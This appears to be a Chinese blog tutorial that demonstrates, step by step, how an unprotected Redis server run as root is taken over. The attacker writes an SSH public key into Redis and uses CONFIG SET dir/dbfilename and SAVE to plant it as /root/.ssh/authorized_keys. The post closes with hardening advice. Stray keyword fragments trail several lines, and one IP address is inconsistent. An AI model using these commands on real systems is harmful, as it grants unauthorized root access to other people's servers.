若是咱們沒有啓用保護模式,支持遠程接入,啓用默認端口6379,並且是用root用戶啓動的,那麼基本上redis就是在裸奔了,人家分分鐘搞你沒商量。redis
咱們模擬一下,如今機器A(ip假設爲10.100.110.11)已經有隻redis在裸奔,咱們從機器B搞它。先讓機器B生成它本身的公鑰:centos
[root@centos ~]# cd .ssh [root@centos .ssh]# ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /root/.ssh/id_rsa already exists. Overwrite (y/n)? y Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. The key fingerprint is: b0:cd:4f:68:4d:8f:8e:57:b9:39:cb:3a:79:c3:c6:54 root@centos The key's randomart image is: +--[ RSA 2048]----+ | | | | | . . | | = + o .E | | . S + +. | | . = ..o | | . +=+ | | .o.*o | | .=o. | +-----------------+ [root@centos .ssh]# ll total 12 -rw------- 1 root root 1675 Nov 5 15:56 id_rsa -rw-r--r-- 1 root root 406 Nov 5 15:56 id_rsa.pub -rw-r--r--. 1 root root 2630 Jul 12 15:12 known_hosts
解釋下,由於以前機器B已經生成過公鑰,因此上面有一個是否覆蓋的提示。接下來咱們把公鑰單獨放到一個文件pub.txt:緩存
[root@centos .ssh]# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > pub.txt [root@centos .ssh]# cat pub.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkbWGbHmhXxXYVYBjkycTkNPOMtrK+7JB3wA6/kkBeB0y35aFCsSB+S5QACMyTiTwEymAqtdMYP0qDNVapPKGYPg6hru2OUYD3jovDiCj8HIdXHq3TL/MetLTbgtPae1883hDtAgb0/TxTlwe93n69j/5FqOgbhVCCdvZv6DcdnMDqYXGiLVQiwvIKXGHRROzHpFNamWsCwzu2S7oo3ES1CF/w9wTs9AHZL6Br+Di/E/ehavS7G2VJckjTtyeyB3TXrXYLPEGw8YlhUO2xkF5CF14fB32QLVQbNOZaDXwK44/AGwsJdlyhjnd3a6OhS5zIQat7qHj+kq/IgzZX1Ykr root@centos
再解釋下,由於該pub.txt文件是要做爲字符串類型的redis緩存value,因此先後咱們加入空格符。dom
進入機器B的redis目錄(無需啓動機器B的redis),使用redis客戶端命令向寫入機器A的redis緩存:ssh
[root@centos redis-4.0.14]# cat /root/.ssh/pub.txt | src/redis-cli -h 10.100.110.10 -x set pub OK
解釋下,這裏默認端口6379無需寫上。鏈接機器A的redis,改寫它的持久化備份文件所在目錄和文件名:ide
[root@centos redis-4.0.14]# src/redis-cli -h 10.100.110.11 10.100.110.11:6379> config set dir /root/.ssh OK 10.100.110.11:6379> config set dbfilename authorized_keys OK 10.100.110.11:6379> save OK
這時到機器A看看,免密登錄文件authorized_keys已經生成:ui
[root@centos1 .ssh]# ll total 8 -rw-r----- 1 root root 411 Nov 5 17:05 authorized_keys -rw-r--r--. 1 root root 870 Mar 30 2017 known_hosts
內容就是機器B的公鑰,因此機器B能夠直接ssh 10.100.110.11登錄到機器A了。加密
從上面被搞的過程能夠發現有如下漏洞和規避方式:spa
一、用root用戶執行redis——用普通用戶code
二、使用6379默認端口——改端口號
三、容許遠程接入——redis.conf把bind 127.0.0.1註釋去掉,只容許本機接入,不過集羣的話這樣明顯不行
四、沒有密碼,裸奔——添加密碼,redis.conf去掉# requirepass foobared這樣的註釋#,配置你本身的密碼,最好不容易破解的
五、config命令的使用——禁用config命令(rename-command CONFIG ""),或者改個名字(rename-command CONFIG hello)
其餘的還有加入防火牆、禁止修改.ssh目錄和authorized_keys文件等。